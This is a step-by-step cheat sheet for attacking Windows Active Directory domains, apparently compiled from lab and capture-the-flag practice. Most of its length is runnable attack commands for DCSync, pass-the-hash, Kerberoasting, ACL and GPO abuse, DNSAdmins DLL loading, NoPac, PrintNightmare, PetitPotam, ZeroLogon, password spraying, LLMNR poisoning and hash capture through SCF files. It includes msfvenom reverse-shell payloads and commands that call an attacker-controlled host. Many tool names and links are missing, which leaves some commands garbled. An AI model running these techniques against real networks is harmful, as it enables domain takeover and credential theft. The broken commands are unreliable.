Attacking Active Directory

Priviledge Escalation


With GetChanges and GetChangesAll, we can perform a DCSync Attack. A DCSync Attack uses commands in the Directory Replication Service Remote Protocol (MS-DRSR), which is used by Domain Controllers to replicate domain data. DCSync uses MS-DRSR to simulate the behaviour of a domain controller and ask other domain controllers to replicate information.

Step 1

Use to get the Administrator's hash. {DOMAIN}/{USER}@{IP}
Step 2

Perform a Pass-the-Hash attack to login as Administrator.

evil-winrm -H {NTLM_HASH} -u Administrator -i {IP}


The account needs to have WriteDACL permission.


We have the ability to write new Account Control Entries (ACEs) to the target object's Discretionary Access Control List (DACL). This means that we can add a user to this group and give them DCSync privileges. DCSync privileges can be given by adding the user to the "Exchange Windows Permissions" group.

Step 1

Create a new user.

net user shelled abc123! /add /domain
Step 2

Add user to "Exchange Windows Permissions" group to give user DCSync permission. Also add user to "Remote Mannagement Users" localgroup to remote into the user's account.

net group "Exchange Windows Permissions" shelled /add
net localgroup "Remote Management Users" shelled /add
Step 3

Import PowerView to perform the exploit.

Import-Module PowerView.ps1
$pass = convertto-securestring 'abc123!' -asplain -force
$cred = new-object'{DOMAIN}\shelled, $pass')
Add-ObjectACL -PrincipalIdentity shelled -Credential $cred -Rights DCSync
Step 4

Use to get the Administrator's hash. {DOMAIN}\shelled@{IP}
Step 5

Perform a Pass-the-Hack attack to login as Administrator.

evil-winrm -H {NTLM_HASH} -u Administrator -i {IP}


The members of the compromised group have the capability to change the user's password in the other group without knowing that user's current password.

Step 1

If you have ForceChangePassword over a group then you can get a list of user's in that group and choose which user we want to change the password for. If you have ForceChangePassword over a user, then skip to step 2.

Get-ADGroupMember -Identity "OTHER_GROUP_NAME"
Step 2

Create a new password variable.

$Password = ConvertTo-SecureString "Password123!" -AsPlainText -Force
Step 3

Change one of the user's passwords to the password you created.

Set-ADAccountPassword -Identity "ACCOUNT" -Reset -NewPassword $Password


Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user. With GnericWrite over a user, we can perform a targeted kerberoasting attack.

Step 1

Download PowerView.ps1 and transfer it to the victim machine.

Step 2

Import the PowerView.ps1 module.

Import-Module .\PowerView.ps1
Step 3

Modify the account's servicePrincipalName attribute to create a fake SPN that we can Kerberoast to obtain the TGS ticket and (hopefully) crack the hash offline using Hashcat or John the Ripper.

Set-DomainObject -Identity {USER_WE_WANT} -SET @{serviceprincipalname='nonexistent/BLAHBLAH'} -Verbose
Step 4

Kerberoast the ticket for the user we want.

Step 5

Crack the password.

hashcat -m 13100 /usr/share/wordlists/rockyou.txt --force


GenericWrite to a group allows you to directly modify group membership of the group.

Step 1

Add our account to the group we have GenericWrite to.

Add-ADGroupMember "GROUP_NAME" -Members "ACCOUNT_NAME"


In this situation we have


permission on a



Step 1



Step 2



to victim machine.

Step 3
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author {DOMAIN}\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators {CURRENT_USER} /add" --GPOName "{GPO_NAME}"
Step 3


.\SharpGPOAbuse.exe --AddComputerTask --TaskName "privesc" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
Step 4

If you can, update the group policy.

gpupdate /force


This grants us full control over a target object. This privilege allows the trustee to manipulate the target object however they wish. To take control over the user, we can do a Targeted Kerberoast Attack on the user or more simply just change the user's password.

Step 1

Create a new password variable.

$Password = ConvertTo-SecureString "Password123!" -AsPlainText -Force
Step 2

Change one of the user's passwords to the password you created.

Set-ADAccountPassword -Identity "ACCOUNT" -Reset -NewPassword $Password


Kerberoasting involves extracting a hash of the encrypted material from a Kerberos “Ticket Granting Service” ticket reply (TGS_REP), which can be subjected to offline cracking in order to retrieve the plaintext password. This is possible because the TGS_REP is encrypted using the NTLM password hash of the account in whose context the service instance is running.

Step 1

Get TGT. {DOMAIN}/{USER} -dc-ip {IP} -request
Step 2

Crack the hash.

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Step 3



A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor doesn’t need to decrypt the hash to obtain a plain text password. Note: PtH is not possible with NTLMv2. NTLM has been succeeded by NTLMv2, which is a hardened version of the original NTLM protocol. NTLMv2 includes a time-based response, which makes simple pass the hash attacks impossible.

Step 1

This step is not needed, if you have obtained the NTLM hash other way, then you can go straight to step 2. This step is just a common way to dump credentials. {DOMAIN}/{USER}@{IP}
Step 2
evil-winrm -H {NTLM_HASH} -u administrator -i {IP}


Members of DNSAdmins group have access to network DNS information. Being a member of the DNSAdmins group allows us to use the dnscmd.exe to specify a plugin DLL that should be loaded by the DNS service.

Step 1

Create a DLL using msfvenom, that changes the administrator password.

msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' - f dll > da.dll
Step 2

Transfering this file will likely trigger Windows Defender, so we are going to use Impacket's

sudo share ./
Step 3

Use dnscmd utility to set the DLL.

cmd /c dnscmd localhost /config /serverlevelplugindll \{IP}\share\da.dll
Step 4

Restart the DNS service.

sc.exe stop dns
sc.exe start dns
Step 5

Login as Administrator with the new password we set.

sudo {DOMAIN}/Administrator@{IP}


Be part of the `LAPS_READER` group.


The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset.

Step 1

Check if you are part of `LAPS_READER` group

Step 2

You can either search for the local admin password with this command, or use a script (Step 3). This command will return a lot of output, but the admin password will be in the field `ms-Mcs-AdmPwd`.

Get-ADComputer -Filter 'ObjectClass -eq "computer"' -Property *
Step 3

You can run this script.


like so:

python -u {USER} -p {PASSWORD} -d {DOMAIN}


PowerShell Remoting also referred to as PSRemoting or Windows Remote Management (WinRM) access allows you to enter an interactive session with the target computer. If authenticating as a low privilege user, a privilege escalation may allow you to gain high privileges on the system.

Step 1

Use `evil-winrm` to remote into the computer (you will be prompt for a password).

evil-winrm -i {IP} -u {USER}


An account with sysadmin privileges on an SQL Server instance can log into the instance remotely and execute queries against the database. This access can be used to run operating system commands in the context of the SQL Server service account through various methods.

Step 1

Get `` from Impacket.

pip install impacket
Step 2 {DOMAIN}/{USER}@{IP} -windows-auth
Step 3

Type `help` to get a list of available options.

Step 4

To get command execution, we can use the `enable_xp_cmdshell` command.

SQL> enable_xp_cmdshell
Step 5

We can now run commands in the format `xp_cmdshell <command>`.

SQL> xp_cmdshell whoami


Once we obtain a list of valid users, we can password spray with a common password to try and login.

Step 1 - Windows

Get the DomainPasswordSpray tool below. If we are authenticated to the domain, the tool will automatically generate a user list from Active Directory, query the domain password policy, and exclude user accounts within one attempt of locking out.

Step 2 - Windows
Import-Module .\DomainPasswordSpray.ps1
Step 3 - Windows
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue


NoPac, also reffered to as `SamAccountName Spoofing` is a vulnerability made up by two CVEs `CVE-2021-42278` and `CVE-2021-42287`, allowing for a standard domain user to escalate privileges to domain admin.

This exploit occurs by changing the SamAccountName of a computer (`DC1`) to a name similar to the SamAccountName of the Domain Controller (`DC1$`). Once done, we can request a TGT from our computer (`DC1`) and then rename our computer to something other than `DC1` and then request a TGS. When processing the TGS request, the KDC will fail to lookup for the requestor machine `DC1` (since we renamed it after requesting the TGT) and the KDC will perform another lookup appending a trailing $. The KDC lookup will succeed. As a result, the KDC will issue the ticket using the privileges of `DC1$`

CVE-2021-42287 - In case a TGS was requested for an account that could not be found, the KDC will attempt to search it again with a trailing \$.

CVE-2021-42287 - A normal user has permission to modify a machine account (up to 10 machines) and as its owner, they also have the permissions to edit its sAMAccountName.

For more information see this article:

Step 1

Clone this repository and make sure impacket is installed

git clone
pip install impacket
Step 2

There's a script called `` in the `NoPac` repository that we will use to check if the machine is vulnerable to `NoPac`.

python3 {DOMAIN}/{USER}:{PASSWORD} -dc-ip {IP} -use-ldap
Step 3

Use the `` script ti get a semi-interactive shell session established on the taget using ``.

sudo python3 {DOMAIN}/{USER}:{PASSWORD} -dc-ip {IP}  -dc-host {DC_HOSTNAME} -shell --impersonate administrator -use-ldap


sudo python3 INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap


PrintNightmare is the nickname given to two vulnerabilities (CVE-2021-34527) and (CVE-2021-1675) found in the Print Spooler service that runs on all Windows operating systems. This vulnerability allows a credentialed domain user to escalate privileges to domain admin. The PrintSpooler service is a service on Windows which allows printing. It is mainly used for managing print jobs which are sent to a print server from a client. The PrintSpooler service runs inside a process called `spoolsv.exe`.

The vulnerability in the PrintSpooler service is an authorization bypass bug which allows anyone to install print drivers using RPC function `RpcAddPrintDriverEx()`. We can use this vulnerability to inject a malicious driver that will run in the context of `spoolsv.exe` which is SYSTEM level privilege.

Step 1

Clone the repository.

git clone
Step 2

For this exploit to work successfully, we will need to use cube0x0's version of Impacket.

pip3 uninstall impacket
git clone
cd impacket
python3 ./ install
Step 3

Check of machine is vulnerable by seeing if `Print System Asynchronous Protocol` and `Print System Remote Protocol` are exposed on the target. @ | egrep 'MS-RPRN|MS-PAR'
Step 4

Craft a reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=8080 -f dll > backupscript.dll
Step 5

Host the reverse shell on an SMB share

sudo -smb2support CompData /path/to/backupscript.dll
Step 6

Setup the reverse shell listener

use exploit/multi/handler
Step 7

Run the exploit

sudo python3 {DOAMIN}/{USER}:{PASSWORD}@{IP}'\\{ATTACKER_IP}\path\to\backupscript.dll'


PetitPotam (CVE-2021-36942) is an LSA spoofing vulnerability. This flaw allows an unauthenticated attacker to force a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC) by abusing Microsoft's Encrypting File System Remote Protocol (MS-EFSRPC) command EfsRpcOpenFileRaw. This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS) is in use.

In the attack, an authentication request from the targeted Domain Controller is relayed to the Certificate Authority (CA) host's Web Enrollment page and makes a Certificate Signing Request (CSR) for a new digital certificate. This certificate can then be used with a tool such as `` to request a TGT for the Domain Controller, which can then be used to achieve domain compromise via a DCSync attack.

Step 1

Start `` and specify the Web Enrollment URL for the CA host.The CA is usually located at `https://<servername>/certsrv`.

sudo -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
Step 2

Get the PetitPotam tool

git clone
Step 3

Use PetitPotam to coerce the Domain Controller to authenticate to our host where `` is running.

python3 {ATTACKER_IP} {DC_IP}
Step 4

In `` we will see a successful login request and obtain the base64 encoded certificate for the Domain Controller if the attack is successful.

Step 5

Get the `` tool

git clone
Step 6

Use the `` tool to request a TGT for the Domain Controller using the Base64 encoded certificate.

Step 7

The TGT will be saved to a file called `dc01.ccache`, which we use to set the `KRB5CCNAME` environment variable, so our attack host uses this file for Kerberos authentication attempts.

export KRB5CCNAME=dc01.ccache
Step 8

Check that the TGT is saved using the `klist` command.

Step 9

We can then use this TGT with `` to perform a DCSYnc and retrieve one or all of the NTLM password hashes for the domain. -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL


Zero Logon (CVE-2020-1472) allows an attacker to go from Zero to Domain Admin. Zero Logon abuses a poor implementation of crytography within MS-NRPC (Microsoft NetLogon Remote Protocol), MS-NRPC is a critical authentication component of Active Directory that handles authentication for User and Machine account.

Microsoft chose to use AES-CFB8 for a function called ComputeNetlogonCredential, which is normally fine, except they had hard coded the Initialization Vector to use all zeros instead of a random string. When an attacker sends a message only containing zeros with the IV of zero, there is a 1-in-256 chance the Ciphertext will be Zero.

Step 1

Run nmap to get the Domain Controller's Name

Step 2

Get this script

Step 3

Run the script using the Domain Controller's Name and the IP address.

python DC01
Step 4

The script above changes the Administrator's password to a blank value. We can now use to dump the NTLM password hashes. -just-dc -no-pass DC01$@
Step 5

Use pass-the-hash or crack the hash to login as domain admin.



You can run bloodhound ingestor from your attacking machine and have the files available to you right away (rather than extracting from Windows machine).

Step 1

Download it from or doing by using pip.

pip3 install bloodhound
Step 2
bloodhound-python -u {USER} -p {PASSWORD} -ns {IP} -d {DOMAIN} -c all


bloodhound-python -u svc-alfresco -p s3rvice -ns -d htb.local -c all
Step 3

Start neo4j database.

sudo neo4j console
Step 4

Start bloodhound and import the data from the bloodhound GUI.



SharpHound is a Windows tool used to collect data from Active Directory to be used in BloodHound (My prefered method is to use the BloodHound Ingestor since you don't need to transfer files after the data collection process, but SharpHound is useful as well).

Step 1

Download and transfer SharpHound.exe to the victim machine.

Step 2

Use SharpHound to collect data from Active Directory.

.\SharpHound.exe -c All --zipfilename {NAME_OF_ZIP}
Step 3

Transfer the zip file back to your attacker machine.

Step 4

Start neo4j database.

sudo neo4j console
Step 5

Start bloodhound and import the data from the bloodhound GUI.



When we compomise an account we can use PowerView.ps1 to enumerate ACLs to identify misconfigurations (This is easier to visualize in BloodHound, but PowerView can be useful as well).

Step 1

Download PowerView.ps1 and transfer it to the victim machine.

Step 2

Import the PowerView.ps1 module.

Import-Module .\PowerView.ps1
Step 3

The command below will find all domain objects that our compromised used has rights over by mapping the user's SID to the SecurityIdentifier property which is what tells us who has the given right over an object.

Get-DomainObjectACL -ResolveGUIDs -Identity * |? {$_.SecurityIdentifier -eq (Convert-NameToSid {COMPROMISED_USERNAME})}


Get-DomainObjectACL -ResolveGUIDs -Identity * |? {$_.SecurityIdentifier -eq (Convert-NameToSid wley)}


Snaffler is a tool used to enumerate Active Directory to find sensitive information by going to all the computers in the Active Directory and figuring out which ones have files shares, and whether you can read them.

Step 1
Step 2
Snaffler.exe -s -d {DOMAIN} -o snaffler.log -v data



If Kerberos Pre-Authentication is Disabled, then AS-REP Roasting is possible.

Step 1 {DOMAIN}/{USER} -dc-ip={IP}

Perform AS-REP Roasting on a users.txt file -usersfile {USERS.txt} -dc-ip {IP} {DOMAIN}/
Step 2
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt


We can bruteforce usernames with the tool Kerbrute. Kerbrute uses Kerberos Pre-Authentication, which is much faster and potentially stealthier way to perform password spraying/user enumeration. The tool sends TGT requests to the domain controller without Kerberos Pre-Authentication to perform username enumeration. If the KDC responds with the error PRINCIPAL UNKNOWN, the username is invalid.

1) Use a large wordlist of common AD names here, and use Kerbute to bruteforce those names.

2) Look through the website for company employees listed on the website, then use a tool to create permutations of the name. Then use Kerbrute to bruteforce those names.

3) Create a wordlist with the tool CEWL for to extract common words on a company website, then use Kerbrute to bruteforce those words.

kerbrute userenum -d <DOMAIN> {USERNAMES.txt} --dc <IP>


We need read access to IPC$ share in order to enumerate users.


The IPC$ share is also known as a null session connection. By using this session, Windows lets anonymous users perform certain activities, such as enumerating the names of domain accounts and network shares.

Step 1 {USERNAME}@{IP} | grep SidTypeUser


You will need unauthenticated write permissions to an SMB file share.


SCF (Shell Command Files) files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. We can abuse SCF files to to elicit an unsuspecting user to submit their NTLMv1/2 hash.

Step 1

Check if you have write permissions to an SMB share on the victims computer.

smb: \> put test.txt
Step 2

Create a file


with the following format:

IconFile=\{ATTACKER_IP}share	est.ico
Step 3



into the SMB share.

smb: \> put exploit.scf
Step 4



to capture the NTLM hash.

responder -I tun0
Step 5



to crack the hash

john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt


Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate method of host identification that can be used when DNS fails. If a machine attempts to resolve a host but DNS resolution fails, typically, the machine will try to ask all other machines on the local network for the correct host address via LLMNR. If LLMNR fails, the NBT-NS will be used. NBT-NS identifes systems on a local network by their NetBIOS name.

LLMNR/NBT-NS are used for name resolution and any host on the network can reply. We can use `Responder` to poison these requests to capture the NTLM/NTLMv2 hash of the user/service. We can then crack these hashes offline using `hashcat` or `john`.


Let's walk through a quick example of the attack flow at a very high level:

1. A host attempts to connect to the print server at \\print01.inlanefreight.local, but accidentally types in \\printer01.inlanefreight.local.

2. The DNS server responds, stating that this host is unknown.

3. The host then broadcasts out to the entire local network asking if anyone knows the location of \\printer01.inlanefreight.local.

4. The attacker (us with `Responder` running) responds to the host stating that it is the \\printer01.inlanefreight.local that the host is looking for.

5. The host believes this reply and sends an authentication request to the attacker with a username and NTLMv2 password hash.

6. This hash can then be cracked offline or used in an SMB Relay attack if the right conditions exist.


You can leave responder running in the background as it captures hashes. The hashes will be stored in `/usr/share/responder/logs` directory.

Step 1 - Linux

With network access achieved, start responder and wait for hashes.

sudo Responder -I {INTERFACE}
Step 2 - Linux

Crack NTLMv2 hash

hashcat -m 5600 {HASH} {WORDLIST}
Step 1 - Windows

Get `Inveigh.exe` from here

Step 2 - Windows

Transfer `Inveigh.exe` to the Windows machine

Step 3 - Windows

Run PowerShell as Administrator.

Step 4 - Windows

Execute `Inveigh.exe`. `Inveigh.exe` executes with default options enabled, so the command below should work fine, but if it doesn't then consider using some flags for execution.

Step 5 - Windows

Crack NTLMv2 hash

hashcat -m 5600 {HASH} {WORDLIST}


SMB NULL sessions allow an unauthenticated attacker to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy.

Option 1 - enum4linux
enum4linux -U {IP}  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
Option 2 - rpcclient
rpcclient -U "" -N {IP}
rpcclient $> enumdomusers 
Option 3 - CrackMapExec
crackmapexec smb {IP} --users


LDAP anonymous binds allow unauthenticated attackers to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain passwrord policy.

Option 1 - ldapsearch
ldapsearch -h {IP} -x -b "DC={DC},DC={DC}" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "
Option 2 - windapsearch
./ --dc-ip {IP} -u "" -U


Once we obtain a list of valid users, we can password spray with a common password to try and login.

Option 1 - Kerbrute
kerbrute passwordspray -d {DOMAIN} --dc {IP} {USERNAMES.txt}  Password123
Option 2 - Bash
for u in $(cat valid_users.txt);do rpcclient -U "$u%Password123" -c "getusername;quit" {IP} | grep Authority; done
Option 3 - CrackMapExec
sudo crackmapexec smb {IP} -u {USERNAMES.txt} -p Password123 | grep +


DNS zone transfer, also sometimes known by the inducing DNS query type AXFR, is a type of DNS transaction that replicates DNS databases across a set of DNS servers. We can use this DNS replication (Zone Transfer) transaction to get more subdomains for our target.

Step 1
dig axfr @{IP} {DNS_NAME_SERVER}


dig axfr @ trick.htb